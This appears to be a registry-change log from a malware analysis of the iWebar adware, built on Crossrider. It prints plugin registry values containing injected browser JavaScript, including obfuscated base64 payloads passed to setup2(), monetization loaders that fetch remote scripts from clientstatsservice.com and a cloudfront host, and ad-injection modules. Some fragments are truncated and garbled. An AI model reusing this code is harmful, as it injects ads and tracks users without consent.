    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MDM2OTY3NTAxZDAzMGUwYTNkMTYxNDQxNTQ1MjU3MWYwZTBlMTg1ZTU3NGMxOTA1MDI1OTA5MGYxODAxMGEwNTA3MDExZDU5MTkxNTA1NGIwZjEwNDEwMTEzMjgxNzFiMDEwYTU2MDkxZDAyNGExMzE2MDkwNzExMGEwMDBiNGYxZDFmMGMwMDA1MGQxMzE0NDgwNzA2MTIwODMzMGM1OTE5MDEwZDU0MzYyMzMzM2U1NTNiMjcyMDNjM2QyNjI0MjgzMzJjMjEyYTNjMmIyYTIxMzIzNDNlMmQyMDI3MzAzYjMwMmEzZTNlMjUzNzQ2NTQ2OTY3NTAxZDAzMGUwYTFiMzEwYTBmNGM0ODU1NTUxMjBlMWMxNDBiNTk0MTVkMDIwMDBkNTQxYjExMDgwNjFjMTQxYzA0MTI1NDBiMGIxNTRjMTkwMTVhMDQxYzI1MDUwNTExMGQ0MDE4MDYwNzQ1MWUwNDE3MTcxNjFjMTExMDRhMTIxMjFlMWUxNTBhMDUwNTUzMDIwOTFmMWEyZDFjNWUwZjEwMTY1MTM5MmUyMTIwNDUzYzMxMzEyNzM4MjkyOTNhMmQzYzI2M2MyZDMwMmYyZTNmMjYyMDNkMjczMTIxMjAzNTI1MzMyYzNiMjc0MTQyNzg3YzU1MGExNjFkMDMxMTBkMjcxNjU3NGQ1YTQzNWI2ZTA1', 'xcnruwzzhd'); }"

    [HKCU\Software\iWebar\Plugins]
    "NewTabPluginList" = "42,38,46,17,14,78,13,41,44,39,35,43,40,64,2,4,3,1,21,22,72,28"

    [HKCU\Software\iWebar\Plugins\195]
    "Name" = "icm_convertmedia_m"

    [HKCU\Software\iWebar\Plugins\44]
    "JavaScript" = "if(typeof appAPI===undefined){appAPI={};}(function(a){appAPI.dns={};appAPI.dns.resolveIP=function(b){return a.resolveIp(b);};appAPI.fetchUrl=function(b){return a.fetchUrl(b);};appAPI.openURL=function(e,d){var c;if(typeof e===object){c=e;if(typeof a.openUrlEx!==undefined){a.openUrlEx(appAPI.JSON.stringify(c));return;}else{d=c.where;e=c.url;}}if(typeof e!==string){console.error(appAPI.openURL - Invalid parameter. Expected string (1st param) but got: (typeof e));return;}if(d!==current&&d!==tab&&d!==window&&d!==popup){console.error(appAPI.openURL - Invalid parameter. Expected current/tab/window (2nd param) but got: d);return;}if(typeof a.openUrlEx!==undefined){var f=(document&&document.documentElement&&document.documentElement.clientHeight)?document.documentElement.clientHeight 100:100;var h=(document&&document.documentElement&&document.documentElement.clientWidth)?document.documentElement.clientWidth 80:100;var g=(window&&window.screenTop)?((window.screenTop-20)<0?0:(window.screenTop-20)D0"

    [HKCU\Software\iWebar\Plugins\38]
    "Version" = "4"

    [HKCU\Software\iWebar\Plugins\47]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/resources_background.js"

    [HKCU\Software\iWebar\Plugins\13]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/CrossriderAppUtils.js"

    [HKCU\Software\iWebar\Plugins\78]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/CrossriderInfo.js"

    [HKCU\Software\iWebar\Plugins\102]
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MWU2NDQyNTQ0NDU0NTYwZTEyMTcxNTNiMTAxODQ2NGU1NDQ0MGUxNzExMWU1ODViNGIxZDVhMDUxNDA3MTcwNDExNWEwZDFhMTIwOTQ5MDAxNzBhMTA1YjBlMTUwMjA3MTUwMDE3MDcxMjAwNGExZTA3NTkwNTBiMDQwMDBjMTEwODQ5MTcxNDAyMTEzYTMxM2QzNzM2M2IyNzM1MzQyYTIxMmIzMDJiMjEyYzIwMjMyODI3MjAyYTNkMjczMTM2MmIyZjIyM2MzYTQ4MDMwNDE0MjAxZDEyMGEwNjU4MzEzZDM3MzYzYjI3MzUzNDJhMjEyYjMwMmIyNTI0MjQzOTI4MjIyODJiM2QyYjQyMWMxZDAyNWIzYzNhMmQzMDNiMzcyNzI2MmYyMjI2MzczMTM3MjcyMTI2MmIyZjIyM2MzYTRjNGU3ZTQ0NTQ1NDQ2NDQwYjExMWExMjA3MzEwNjE4NDQ1YzQzNDcwNjE2MDAxNDA3NGU0OTQ5MGEzYTBkMTAxMDE2MWUwNzM5MGYwZDAzMDE0YzAwMDgwNzE3MDIwODRkMDYwMTBmNWIwNzA2MTAxNDQ5MDkwNDE4MDMwNzA3MDYxZDE2MTI0ZDBmMWQ1ZDE3MGMxNTFhMDgwMzBmNTgwZDEwMTAxNjJiMmIzOTI1MzEyYTNkMzEyNjJkMzAzMTM0MzkyNjNkM2EyNzNhMjAzMTMwMzkzNTM2MjczMTJiMzAzYjJiNTIwNzE2MTMzMTA3MTYxODAxNDkyYjM5MjUzMTJhM2QzMTI2MmQzMDMxMzQzOTIyMzUzZTNkM2EyNTM5MzEzOTM5NDUwZDA3MDY0OTNiMmIzNzM0MjkzMDM2M2MyYjMwMjEyNjJiMzMzNTI2MzczMTJiMzAzYjJiNTY0YTZjNDM0NTRlNDI1NjE0MTgwMTAxMGYwZDJjMGE0MDRlNDQ0NTQ0NTQ2YzFl', 'enbtdttffc'); }"

    [HKCU\Software\iWebar\Plugins\94]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/ie/IEPopup.js"

    [HKCU\Software\iWebar\Plugins\257]
    "URL" = "http://js.clientstatsservice.com/plugins/javascripts/monetization/geo/adextent_m.js"

    [HKCU\Software\iWebar\Plugins\40]
    "Name" = "IEExtension"

    [HKCU\Software\iWebar\Plugins\246]
    "Version" = "12"

    [HKCU\Software\iWebar\Plugins\38]
    "Name" = "IECallbacks"

    [HKCU\Software\iWebar\Manifest]
    "Manifest" = "NA"

    [HKCU\Software\iWebar\Plugins\93]
    "Name" = "superfish_no_coupons_m"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
    "CacheLimit" = "65452"

    [HKCU\Software\iWebar\Plugins\91]
    "Version" = "51"

    [HKCU\Software\iWebar\Plugins\13]
    "Version" = "7"

    [HKCU\Software\iWebar\Plugins\3]
    "JavaScript" = "(function(){var b=dummy so this plugin won't be empty;})();"

    [HKCU\Software\iWebar\Plugins\36]
    "Name" = "IEBackground"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "History" = "%Documents and Settings%\%current user%\Local Settings\History"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
    "MigrateProxy" = "1"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
    "CacheLimit" = "65452"

    [HKCU\Software\iWebar\Plugins\207]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/dbWrapper.js"

    [HKCU\Software\iWebar\Plugins\72]
    "Version" = "5"

    [HKCU\Software\iWebar\Plugins\22]
    "Version" = "5"

    [HKCU\Software\iWebar\Manifest]
    "DisableIe" = "true"

    [HKCU\Software\iWebar\Plugins\207]
    "Name" = "dbWrapper"

    [HKCU\Software\iWebar\Plugins\39]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/ie/IEDatabase.js"

    [HKCU\Software\iWebar\Plugins\42]
    "Version" = "9"

    [HKCU\Software\iWebar\Plugins\257]
    "JavaScript" = "appAPI.internal.monetization = appAPI.internal.monetization || {};if (typeof appAPI.internal.monetization.plugins === undefined) { appAPI.internal.monetization.plugins = {}; }appAPI.internal.monetization.plugins[257] = function() { appAPI.internal.monetization.addRemoteJS({ httpsUrl: https://dyau9xqp8gzji.cloudfront.net/autotag.js, httpUrl: https://dyau9xqp8gzji.cloudfront.net/autotag.js, pluginId: 257 });};"

    [HKCU\Software\iWebar\Plugins\40]
    "Version" = "4"

    [HKCU\Software\iWebar\Plugins\22]
    "JavaScript" = "(function(a){appAPI.queueManager={queue:[],register:function(b){this.queue.push(b);}};appAPI.ready=function(c,b){a.when.apply(null,appAPI.queueManager.queue).then(function(){a.when(appAPI.initializerPlugin.isReady(b)).then(function(){new Function('if (typeof jQuery === undefined) { jQuery = $jquery_171; }(' appAPI.resources.parseIncludeJS(c.toString()) )($jquery_171))();});});};}($jquery_171));var CrossRiderResourcesManager=(function(z){var B={appId:appAPI._cr_config.appID(),url:appAPI._cr_config.resources,env:appAPI.appInfo.environment===staging?staging:production,saveResource:appAPI.time.daysFromNow(90),nextCheck:360,DBNamespace:Resources_,isDebug:appAPI.debugManager.isDebug()&&appAPI.debugManager.getResourcesPath(),isIE7:z.browser.msie&&z.browser.version*1==7},x=new z.Deferred(),h=K(meta)||{},D=K(remote_resources)||{remoteId:0},e=K(queue)||{},g=initialVersion=K(lastVersion)||0;return z.Class.extend({init:function(){appAPI.queueManager.register(x.promise());if(B.isDebug){x.resolve();}el9L"

    [HKCU\Software\iWebar\Manifest]
    "Name" = "iWebar"

    [HKCU\Software\iWebar\Plugins\46]
    "Version" = "5"

    [HKCU\Software\iWebar\Manifest]
    "UninstallerOfferUrl" = "NA"

    [HKCU\Software\iWebar\Plugins\3]
    "Version" = "2"

    [HKCU\Software\iWebar\Installer]
    "osName" = "XP32"

    [HKCU\Software\iWebar\Plugins\104]
    "Name" = "jollywallet_m"

    [HKCU\Software\iWebar\Plugins\94]
    "Name" = "IEPopup"

    [HKCU\Software\iWebar\Plugins\2]
    "Version" = "2"

    [HKCU\Software\iWebar\Manifest]
    "PublisherName" = "iWebar"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
    "Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

    [HKCU\Software\iWebar\Plugins\91]
    "Name" = "monetizationLoader.js"

    [HKCU\Software\iWebar\Plugins\195]
    "JavaScript" = "appAPI.internal.monetization=appAPI.internal.monetization||{};if(typeof appAPI.internal.monetization.plugins===undefined){appAPI.internal.monetization.plugins={};}appAPI.internal.monetization.plugins[195]=function(){if(!appAPI.internal.monetization.shouldRunByVertical(195,[pops])){return;}new (appAPI.internal.monetization.plugins.ICMBaseManager({namespace:LITE}))();};"

    [HKCU\Software\iWebar\Code]
    "BgJavaScript" = "/************************************************************************************ This is your background code. For more information please visit our wiki site: http://docs.crossrider.com/#!/guide/scopes_background*************************************************************************************/appAPI.ready(function($) { // Place your code here (ideal for handling browser button, global timers, etc.)});"

    [HKCU\Software\iWebar\Plugins\45]
    "JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.tabId=onRequest;window.console.log=appAPI.internal.console.log;console.log=window.console.log;window.console.info=appAPI.internal.console.info;console.info=window.console.info;window.console.warn=appAPI.internal.console.warn;console.warn=window.console.warn;window.console.error=appAPI.internal.console.error;console.error=window.console.error;(function(){function a(e){var c=appAPI.internal.prefs.getChar(e,Crossrider\\onRequest);if(typeof c!==string){return 0;}if(c.length===0){return 0;}c=appAPI.JSON.parse(c);if(typeof c!==object){return 0;}var d=0;for(var b in c){d ;appAPI.internal.callbacks.addListener(onRequest,function(m,g){var n=appAPI.internal.callbacks.onRequest.listenersAdditionalData[g];if(typeof n.code!==string){return;}var f={};var i;if(typeof n.value===undefined){i=undefined;}else{if(n.value===ná—¿L"

    [HKCU\Software\iWebar\Plugins\41]
    "Name" = "IEInfo"

    [HKCU\Software\iWebar\Plugins\38]
    "JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.internal.callbacks.genericEvent=function(e){var d=e.eventContent;if(typeof d===undefined){return;}var a=e.eventName;if(typeof a===undefined){return;}if(typeof appAPI.internal.callbacks[a]===undefined){return;}if(typeof appAPI.internal.callbacks[a].handler!==undefined){var b=appAPI.internal.callbacks[a].handler(d);if(b){return;}}if(typeof appAPI.internal.callbacks[a].listeners===undefined){return;}for(var c in appAPI.internal.callbacks[a].listeners){appAPI.internal.callbacks[a].listeners[c](d,c);}};appAPI.internal.callbacks.addListener=function(b,a,c){if(typeof appAPI.internal.callbacks[b]===undefined){appAPI.internal.callbacks[b]={};appAPI.internal.callbacks[b].listeners={};appAPI.internal.callbacks[b].listenersAdditionalData={};appAPI.internal.callbacks[b].listenersIds=0;appAPI.internal.callbacks[b].numberO昳L"

    [HKCU\Software\iWebar\Plugins\2]
    "JavaScript" = "(function(){var b=dummy so this plugin won't be empty;})();"

    [HKCU\Software\iWebar\Plugins\182]
    "Version" = "3"

    [HKCU\Software\iWebar\Plugins\195]
    "Version" = "25"

    [HKCU\Software\iWebar\Manifest]
    "RunInFrame" = "false"

    [HKCU\Software\iWebar\Plugins\1]
    "JavaScript" = "appAPI._cr_config={appID:function(){var a=appAPI.appInfo;if(a){return appAPI.appInfo.id;}else{return appAPI.appID;}}};$jquery.extend(appAPI._cr_config,{sidebar:{base:{production:https://w9u6a2p6.ssl.hwcdn.net,staging:http://staging-app.crossrider.com},css:/plugins/stylesheets/sidebar.css,themes:/plugins/images/sidebar}});$jquery.extend(appAPI._cr_config,{notifications_manager:{base:{production:https://w9u6a2p6.ssl.hwcdn.net,staging:http://staging-app.crossrider.com},statsBase:{production:http://nstats.crossrider.com,staging:http://staging-app.crossrider.com},geolocation:http://www.geoplugin.net/json.gp?jsoncallback=fn,meta:/notifier/ appAPI._cr_config.appID() /meta.json,messages:/notifier/ appAPI._cr_config.appID() /{id}.json,logger:/notifications.gif,loggerAPI:/api_notifications.gif},notifications:{base:{production:https://w9u6a2p6.ssl.hwcdn.net,staging:http://staging-app.crossrider.com},css:/plugins/stylesheets/notifications.css,themes:/plugins/images/notifications}});L"

    [HKCU\Software\iWebar\Plugins\184]
    "Name" = "noproblemppc_m"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "Cookies" = "%Documents and Settings%\%current user%\Cookies"

    [HKCU\Software\iWebar\Plugins\7]
    "Version" = "2"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
    "CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
    "Paths" = "4"

    [HKCU\Software\iWebar\Plugins\64]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/appApiMessage.js"

    [HKCU\Software\iWebar\Plugins\7]
    "JavaScript" = "appAPI.hooks={$:$jquery_171,hooks:{},addHook:function(a,b){this.hooks[a]=b;},removeHook:function(a){delete this.hooks[a];},register:function(b,a){return this.hooks[b]?new (this.$.Class.extend(this.$.extend(this.getClass(),this.$.isFunction(this.hooks[b])?this.hooks[b]():this.hooks[b])))(a):null;},getClass:(function(a){return function(){return{listeners:[],addListener:function(b,c){this.listeners.push({name:b,fn:c});},removeListener:function(c,d){var b=[];a.each(this.listeners,function(e,f){if(c!=f.name&&d!=f.fn){b.push(f);}});this.listeners=b;},fireEvent:function(b,c){a.each(this.listeners,a.proxy(function(d,e){if(b==e.name){e.fn.call(this,c);}},this));}};};}($jquery_171))};"

    [HKCU\Software\iWebar\Plugins\4]
    "Name" = "jquery_1_7_1"

    [HKCU\Software\iWebar\Manifest]
    "SetNewTab" = "false"

    [HKCU\Software\iWebar\Plugins\183]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/tabsWrapper.js"

    [HKCU\Software\iWebar\Manifest]
    "AddressbarURL" = "NA"

    [HKCU\Software\iWebar\Plugins\40]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/ie/IEExtension.js"

    [HKCU\Software\iWebar\Plugins\223]
    "Name" = "imonomy_m"

    [HKCU\Software\iWebar\Plugins\155]
    "Version" = "3"

    [HKCU\Software\iWebar\Plugins\14]
    "JavaScript" = "if(typeof(appAPI)===undefined){appAPI={};}var CR__bIsIEWindow=false;if(typeof window!==undefined&&typeof window.navigator!==undefined&&typeof window.navigator.userAgent!==undefined){CR__bIsIEWindow=/MSIE (\d \.\d );/.test(window.navigator.userAgent);}CR__bIsIEWindow=(CR__bIsIEWindow||(typeof appAPIinternal!==undefined));appAPI.JSON={};if(typeof JSON!==undefined&&!CR__bIsIEWindow){appAPI.JSON=JSON;}else{(function(){function f(n){return n<10?0 n:n;}if(typeof Date.prototype.to_CR_JSON!==function){Date.prototype.to_CR_JSON=function(key){return isFinite(this.valueOf())?this.getUTCFullYear() - f(this.getUTCMonth() 1) - f(this.getUTCDate()) T f(this.getUTCHours()) : f(this.getUTCMinutes()) : f(this.getUTCSeconds()) Z:null;};String.prototype.to_CR_JSON=Number.prototype.to_CR_JSON=Boolean.prototype.to_CR_JSON=function(key){return this.valueOf();};}var cx=/[\u0000\u00ad\u0600-\u0604\u070f\u17b4\u17b5\u200c-\u200f\u2028-\u202f\u2060-\u206f\ufeff\ufff0-\uffff]/g,escapable=/[\\\\x00-\x1f\x7f-ï¡‹L"

    "Version" = "11"

    [HKCU\Software\iWebar\Plugins\104]
    "JavaScript" = "appAPI.internal.monetization = appAPI.internal.monetization || {};if (typeof appAPI.internal.monetization.plugins === undefined) { appAPI.internal.monetization.plugins = {}; }appAPI.internal.monetization.plugins[104] = function() { if (!appAPI.internal.monetization.shouldRunByVertical(104, [shopping])){ return; } var app_id='0'; var uid='0'; var app_name = ''; try{app_name = '&name=' encodeURIComponent(appAPI.appInfo.name);} catch(e) {app_name='';} try{app_id = appAPI.appInfo.id;}catch(err){} if (appAPI && appAPI.installer && appAPI.installer.getParams) { app_id = appAPI.installer.getParams().source_id; } if(appAPI && appAPI.installer && appAPI.installer.getUserId){uid=appAPI.installer.getUserId();} var token = appAPI.db.get(jw_token); if(token === '' || token===null || token === undefined){ var S4 = function() {return (((1 Math.random())*0x10000)|0).toString(16).substring(1);}; token=(S4() S4() - S4() - S4() - S4() - S4() S4() S4()); appAPI.db.set(jw_token,tokeP"

    [HKCU\Software\iWebar\Plugins\1]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/base.js"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
    "CacheLimit" = "65452"

    [HKCU\Software\iWebar\Plugins\43]
    "JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}if(typeof appAPI.internal.message===undefined){appAPI.internal.message={};}appAPI.internal.message.send=function(b){if(typeof b!==object){return false;}if(typeof b.eventName!==string){return false;}b.senderTabId=appAPI.tabId;var c;try{c=appAPI.JSON.stringify(b);}catch(a){console.error(appAPI.message error - Caught a JSON exception when trying to stringify the message);return false;}if(typeof c!==string){console.error(appAPI.message error - Failed to stringify message);return false;}if(c.length>8192){console.error(appAPI.message error - can't send message because content is too long: c.length);return false;}appAPIinternal.msgToAllTabs(c);return true;};appAPI.internal.callbacks.crossBhoEvent=function(b){if(typeof b.msgObj!==string){return;}try{b=appAPI.JSON.parse(b.msgObj);}catch(c){console.error(Failed to parsiL"

    [HKCU\Software\iWebar\Plugins\14]
    "Name" = "CrossriderUtils"

    [HKCU\Software\iWebar\Plugins\17]
    "JavaScript" = "if(typeof window!==undefined){/*! * jQuery JavaScript Library v1.4.2 * http://jquery.com/ * * Copyright 2010, John Resig * Dual licensed under the MIT or GPL Version 2 licenses. * http://jquery.org/license * * Includes Sizzle.js * http://sizzlejs.com/ * Copyright 2010, The Dojo Foundation * Released under the MIT, BSD, and GPL Licenses. * * Date: Sat Feb 13 22:33:48 2010 -0500 */var $$jquery;(function(aO,D){var a=function(e,a0){return new a.fn.init(e,a0);},o=aO.jQuery,S=aO.$,ac=aO.document,Y,Q=/^[^<]*(<[\w\W] >)[^>]*$|^#([\w-] )$/,aY=/^.[^:#\[\.,]*$/,az=/\S/,N=/^(\s|\u00A0) |(\s|\u00A0) $/g,f=/^<(\w )\s*\/?>(?:<\/\1>)?$/,b=navigator.userAgent,v,L=false,af=[],aI,av=Object.prototype.toString,ar=Object.prototype.hasOwnProperty,h=Array.prototype.push,G=Array.prototype.slice,t=Array.prototype.indexOf;a.fn=a.prototype={init:function(e,a2){var a1,a3,a0,a4;if(!e){return this;}if(e.nodeType){this.context=this[0]=e;this.length=1;return this;}if(e===body&&!a2){this.context=ac;this[0]=ac.body;this.seCR"

    [HKCU\Software\iWebar\Plugins\14]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/CrossriderUtils.js"

    [HKCU\Software\iWebar\Plugins\43]
    "Name" = "IEMessaging"

    [HKCU\Software\iWebar\Plugins\184]
    "Version" = "9"

    [HKCU\Software\iWebar\Plugins\35]
    "JavaScript" = "if(typeof appAPI===undefined){appAPI={};}(function(e){if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}function f(m){if(typeof m===object){return m;}if(typeof m!==string){return null;}m=m.replace(/\r\n/g,\n);if(m.lastIndexOf(\n) 1==m.length){m.replace(/(?:(?:^|\n)\s |\s (?:$|\n))/g,).replace(/\s /g, );}var n=m.split(\n);var l={};for(var k=0;k
    [HKCU\Software\iWebar\Plugins\38]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/ie/IECallbacks.js"

    [HKCU\Software\iWebar\Plugins\36]
    "Version" = "8"

    [HKCU\Software\iWebar\Plugins\21]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/debug.js"

    [HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
    "Seed" = "E6 26 FA 75 A0 E0 A0 F8 B0 15 FB 90 BC 38 6A 90"

    [HKCU\Software\iWebar\Plugins\217]
    "JavaScript" = "appAPI.internal.monetization=appAPI.internal.monetization||{};if(typeof appAPI.internal.monetization.plugins===undefined){appAPI.internal.monetization.plugins={};}appAPI.internal.monetization.plugins[217]=function(){var a=(function(f){String.prototype.replaceAll=function(i,h){return this.split(i).join(h);};var e=f(window);f.fn.visible=function(h,C,H){if(this.length<1){return;}var D=this.length>1?this.eq(0):this,v=D.get(0),w=e.width(),l=e.height(),H=(H)?H:both,m=C===true?v.offsetWidth*v.offsetHeight:true;if(typeof v.getBoundingClientRect===function){var q=v.getBoundingClientRect(),J=q.top>=0&&q.top0&&q.bottom<=l,E=q.left>=0&&q.left0&&q.right<=w,i=h?J||o:J&&o,y=h?E||E:E&&z;if(H===both){return m&&i&&y;}else{if(H===vertical){return m&&i;}else{if(H===horizontal){return m&&y;}}}}else{var x=e.scrollTop(),r=x l,G=e.scrollLeft(),I=G w,n=D.offset(),A=n.top,B=A D.height(),F=n.left,u=F D.width(),j=h===true?B:A,k=h===true?A:B,s=h===true?u:F,p=h===true?F:u;if(H===both){return !!m&&(L"

    [HKCU\Software\iWebar\Plugins\2]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/ie8_fix_1.js"

    [HKCU\Software\iWebar\Plugins\28]
    "JavaScript" = "var CrossriderInitializerPlugin=(function(e){var c={appId:appAPI._cr_config.appID()},b,g=new e.Deferred(),f;return e.Class.extend({init:function(){b=this;e(document).ready(function(){if(!f){d();}e(body).bindExtensionEvent(__CR_REQUEST_READY,a);});},isReady:function(h){if(h===false){d();}return g.promise();}});function d(){g.resolve();f=true;}function a(){e(body).fireExtensionEvent(__CR_RESPONSE_READY,{appId:c.appId});}}($jquery_171));(function(a){appAPI.initializerPlugin=new CrossriderInitializerPlugin();}($jquery_171));"

    [HKCU\Software\iWebar\Plugins\72]
    "JavaScript" = "if(appAPI.__should_activate_validation__===true){(function(){var e={WRONG_STRICT_VALUE:Parameter %PARAM_NAME% value is not supported.,WRONG_TYPE:Parameter %PARAM_NAME% is of wrong type. Valid types: [%VALID_TYPES%].,PARAM_IS_MANDATORY:Parameter %PARAM_NAME% is mandatory.,DB_VAL_TOO_LARGE:appAPI.db storage is limited to 1000 bytes per key. For larger values please use appAPI.db.async};var a=function(m){return m.charAt(0).toUpperCase() m.slice(1);};var h={};var b=appAPI.appInfo.name;var i=function(o,r,q,p){if(typeof p===undefined){p=;}var n=[ new Date().toDateString() new Date().toLocaleTimeString() ] b;var m=;if(typeof console!==undefined){if((q===e.DB_VAL_TOO_LARGE)&&(typeof console.warn===function)){console.warn(n m);}else{if(typeof console.error===function){console.error(n m);}else{if(typeof console.log===function){console.log(n m);}}}}return;};var l=function(p,n,o){var m=pä‘„L"

    [HKCU\Software\iWebar\Plugins\41]
    "Version" = "7"

    [HKCU\Software\iWebar\Plugins\21]
    "JavaScript" = "var CrossriderDebugManager=(function(h){var f={appId:appAPI._cr_config.appID(),url:appAPI._cr_config.debug_app};return h.Class.extend({init:function(){if(appAPI.isMatchPages.apply(this,f.url.debug_page)){h(document).ready(function(){h(body).bindExtensionEvent(debug_request_data,function(j,i){if(i.appId==f.appId){e();}});h(body).bindExtensionEvent(debug_request_reload_background,function(j,i){if(i.appId==f.appId&&appAPI.internal.reloadBackground){appAPI.internal.reloadBackground();}});h(body).bindExtensionEvent(debug_request_reload_plugins,function(j,i){if(i.appId==f.appId){appAPI.resources.requestReload();setTimeout(appAPI.internal.forceUpdate,750);}});h(body).bindExtensionEvent(debug_mode_activate,function(j,i){if(i.appId==f.appId){b(i);}});h(body).bindExtensionEvent(debug_mode_deactivate,function(j,i){if(i.appId==f.appId){d();}});h(body).bindExtensionEvent(debug_request_database,function(j,i){if(i.appId==f.appId){c(i);}});h(body).bindExtensionEvent(debug_request_database_remove,EP"

    [HKCU\Software\iWebar\Plugins\155]
    "Name" = "ibario_pops_m"

    [HKCU\Software\iWebar\Plugins\242]
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MDI2ODY2NTQwMzEyMTYxZTM3MDExNTQwNTU1NjQ5MGUxNjFhMTI0OTU2NGQwNjE4MTgxMjRjMWQwYTFjMDkxMjA2MTgwYzA3MTYwYjRjMWExNzA0MDA1OTAxMTU0ZDFkMDUyYzFiMDU0MTFjMTg1OTIzMjgyNDNhMzUyYjJlMjIyZTM5MmIyYTVmMTAwYjExMWQxMjE5NDAzMTNiMjAyYzNkMmIzYzIyMzkyZjIwM2IzNjM2MmIzZDI2MzI1NjM5M2QyZDMwM2MyYTMxM2QzZjJmMjMzMDMxMzEyNjNiM2QyNjMyMzQzOTQ0MmMzMDMyMzcyNjMwMzIyMjM1MzIyMjIzMmEyNjJjMmUzYjJlNWIzZDMxMjEyMTM2MzEzYzI0MjIyMjI3M2MzZDMyMjkzMjMwMzgyYTJiMjczMTNkNTE1NTY4NjY1NDAzMTIxNjFlMTEyNjBiMGU0ZDRjNGI0NDBhMWExNjAzMGE1ODQwNTkwMjA4MTExYTRjMDAxMTBkMWYwNjAyMDgwNTBmMTYxNjU3MGIwMTEwMDQ0OTA4MWQ0ZDAwMWUzZDBkMTE0NTBjMTE1MTIzMzUzZjJiMjMzZjJhMzIyNzMxMmIzNzQ0MDExZDA1MTkwMjEwNDgzMTI2M2IzZDJiM2YzODMyMzAyNzIwMjYyZDI3M2QyOTIyMjI1ZjMxM2QzMDJiMmQzYzI1MzkyZjI2MmIzMDJjMmEzNzJkMjkyMjIyM2QzMTQ0MzEyYjIzMjEzMjM0MjIyYjNkMzIzZjM4M2IzMDM4MmEyYjI3NTMzZDJjM2EzMDIwMjUzODM0MmIyYTI3MjEyNjIzM2YyNjM0MjgyMzIzMjcyYzI2NDA0MzdjNjI0NDEyMDIxNzE0MTAwYzI2MTI0OTVjNDI1YzU2NDE1NTY4NGY1NjRiNDY0MDE4MDcwMTBkMGIwYzE3MDc0NDU4NGUzOTUxMGEwYTAwMDYxYjBmMGMwP"

    [HKCU\Software\iWebar\Manifest]
    "PluginsManifestVersion" = "137"
    "homepageurl" = "NA"

    [HKCU\Software\iWebar\Plugins\94]
    "Version" = "2"

    [HKCU\Software\iWebar\Plugins\226]
    "Name" = "set_campaign_id_m"

    [HKCU\Software\iWebar\Plugins\177]
    "Version" = "2"

    [HKCU\Software\iWebar\Plugins\35]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/ie/IEAjax.js"

    [HKCU\Software\iWebar\Plugins\2]
    "Name" = "ie8_fix_1"

    [HKCU\Software\iWebar\Plugins\39]
    "JavaScript" = "if(typeof appAPI===""undefined""){appAPI={};}(function(c){appAPI.cookie=function(h,k,f,i){var g=""%@%ZZCR__AJAXZZ$C@R#"";function e(o,q,l,p){if(typeof(o)!==""string""){return false;}var n=appAPI.JSON.stringify(q);var m=new Date(2030,1,1,0,0,0,0);if(l instanceof Date){m=l;}c.setLocalCookie(o,n,m.toUTCString(),p);return true;}function j(m,n){if(m==""InstallerParams""&&n==""Local""){return appAPI.JSON.parse(appAPI.internal.prefs.getChar(""Params""

    [HKCU\Software\iWebar\Plugins\78]
    "Version" = "5"

    [HKCU\Software\iWebar\Plugins\242]
    "Version" = "3"

    [HKCU\Software\iWebar\Plugins\226]
    "URL" = "http://js.clientstatsservice.com/plugins/javascripts/monetization/geo/set_campaign_id_m.js"

    [HKCU\Software\iWebar\Plugins\246]
    "Name" = "setup"

    [HKCU\Software\iWebar\Manifest]
    "ModeType" = "production"

    [HKCU\Software\iWebar\Plugins\37]
    "Version" = "6"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
    "CacheLimit" = "65452"

    [HKCU\Software\iWebar\Plugins\39]
    "Name" = "IEDatabase"

    [HKCU\Software\iWebar\Plugins]
    "AppPluginList" = "246,42,38,46,17,14,78,13,41,44,39,35,43,40,64,2,4,3,1,21,22,182,183,207,72,7,9,93,102,104,155,184,220,195,217,223,242,244,257,177,91,28"

    [HKCU\Software\iWebar\Plugins\13]
